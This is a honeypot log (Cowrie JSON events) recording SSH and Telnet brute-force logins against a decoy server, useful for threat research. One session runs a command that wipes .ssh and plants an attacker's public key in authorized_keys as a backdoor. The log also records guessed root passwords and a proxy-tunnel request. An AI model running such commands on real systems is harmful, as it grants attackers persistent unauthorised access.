{"eventid":"cowrie.session.connect","src_ip":"83.168.71.41","src_port":49574,"dst_ip":"1.2.3.4","dst_port":22,"session":"2674db7f5b78","protocol":"ssh","message":"New connection: 83.168.71.41:49574 (1.2.3.4:22) [session: 2674db7f5b78]","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.701859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.703279Z","src_ip":"83.168.71.41","session":"2674db7f5b78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.720980Z","src_ip":"83.168.71.41","session":"2674db7f5b78"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.832519Z","src_ip":"83.168.71.41","session":"2674db7f5b78"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.851534Z","src_ip":"83.168.71.41","session":"5c34670cd561"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:53:58.852616Z","src_ip":"83.168.71.41","session":"2674db7f5b78"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":53306,"dst_ip":"1.2.3.4","dst_port":22,"session":"da61a6f2d145","protocol":"ssh","message":"New connection: 199.195.248.191:53306 (1.2.3.4:22) [session: da61a6f2d145]","sensor":"my-vps","timestamp":"2025-08-26T19:53:59.970840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:53:59.972732Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:54:00.060261Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.login.success","username":"root","password":"vicidial123","message":"login attempt [root/vicidial123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:00.437648Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:54:00.643763Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:54:00.644528Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:54:00.645966Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:00.747136Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:54:01.085869Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.086920Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.188058Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.189038Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":53944,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d2ebf74c412","protocol":"ssh","message":"New connection: 199.195.248.191:53944 (1.2.3.4:22) [session: 6d2ebf74c412]","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.277381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.279740Z","src_ip":"199.195.248.191","session":"6d2ebf74c412"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.369936Z","src_ip":"199.195.248.191","session":"6d2ebf74c412"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:54:01.724727Z","src_ip":"199.195.248.191","session":"6d2ebf74c412"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:02.814291Z","src_ip":"199.195.248.191","session":"6d2ebf74c412"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":54558,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e367b7a9606","protocol":"ssh","message":"New connection: 199.195.248.191:54558 (1.2.3.4:22) [session: 6e367b7a9606]","sensor":"my-vps","timestamp":"2025-08-26T19:54:02.899154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:54:02.900142Z","src_ip":"199.195.248.191","session":"6e367b7a9606"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45174,"dst_ip":"1.2.3.4","dst_port":23,"session":"e640c3bf6947","protocol":"telnet","message":"New connection: 212.227.235.229:45174 (1.2.3.4:23) [session: e640c3bf6947]","sensor":"my-vps","timestamp":"2025-08-26T19:54:02.946306Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:54:02.988401Z","src_ip":"199.195.248.191","session":"6e367b7a9606"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.147386Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:54:03.231209Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.232435Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.233143Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.458490Z","src_ip":"199.195.248.191","session":"6e367b7a9606"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.552331Z","src_ip":"199.195.248.191","session":"da61a6f2d145"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:03.553190Z","src_ip":"199.195.248.191","session":"6e367b7a9606"}
{"eventid":"cowrie.session.connect","src_ip":"185.220.101.97","src_port":2347,"dst_ip":"1.2.3.4","dst_port":22,"session":"a273f695dc53","protocol":"ssh","message":"New connection: 185.220.101.97:2347 (1.2.3.4:22) [session: a273f695dc53]","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.027125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_9.9","message":"Remote SSH version: SSH-2.0-OpenSSH_9.9","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.155810Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.client.kex","hassh":"1cc79c7da9b5d5eead2c60983332a556","hasshAlgorithms":"sntrup761x25519-sha512,sntrup761x25519-sha512@openssh.com,mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["sntrup761x25519-sha512","sntrup761x25519-sha512@openssh.com","mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1cc79c7da9b5d5eead2c60983332a556","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.216733Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":41748,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bcb47cdc6d9","protocol":"ssh","message":"New connection: 217.154.1.158:41748 (1.2.3.4:22) [session: 6bcb47cdc6d9]","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.485627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.486580Z","src_ip":"217.154.1.158","session":"6bcb47cdc6d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.500371Z","src_ip":"217.154.1.158","session":"6bcb47cdc6d9"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.546968Z","src_ip":"217.154.1.158","session":"6bcb47cdc6d9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.774791Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"d4:98:c4:f3:12:ef:3e:29:38:34:62:21:fd:99:ec:ef","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmvEhhfC8Hkqvut8spTxhahy1wKRJ/Bgy8HRDj6n+9EWntZc/L9zfjgReYfwWiZbNX5ziI4dv5lsUAMyCjbqxI4R0Vr5zoQf+YUrQ9nLwIjmkggnqPObpHoEz/n3xvNudIKXjWpEL3b5Be17y8vF01jzFc75asMXz5rLbYOi0EamMu5E+FxhaqNfMMasAkhpom4XfdF3/FZH41UTiaWhoZoPc8KcLJqotmlIZ/z04m0HI9w7l9l+wrUVuEGYbFTN4g3cCtDI21d4AH2JtIJkkKApW4ElLNGasOpid5lDWUHbhbrD4/6Um1u1SqyOmdKopIzkllPFqxJZMjwcw8f9v","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.775469Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:54:08.864612Z","src_ip":"185.220.101.97","session":"a273f695dc53"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:09.562869Z","src_ip":"217.154.1.158","session":"6bcb47cdc6d9"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35898,"dst_ip":"1.2.3.4","dst_port":22,"session":"6afc45173600","protocol":"ssh","message":"New connection: 217.154.1.158:35898 (1.2.3.4:22) [session: 6afc45173600]","sensor":"my-vps","timestamp":"2025-08-26T19:54:25.899226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:54:25.900230Z","src_ip":"217.154.1.158","session":"6afc45173600"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:54:25.914972Z","src_ip":"217.154.1.158","session":"6afc45173600"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:54:25.959912Z","src_ip":"217.154.1.158","session":"6afc45173600"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:54:26.976089Z","src_ip":"217.154.1.158","session":"6afc45173600"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":443,"src_ip":"185.220.101.97","src_port":54388,"message":"direct-tcp connection request to google.com:443 from 127.0.0.1:54388","sensor":"my-vps","timestamp":"2025-08-26T19:54:27.927998Z","session":"a273f695dc53"}
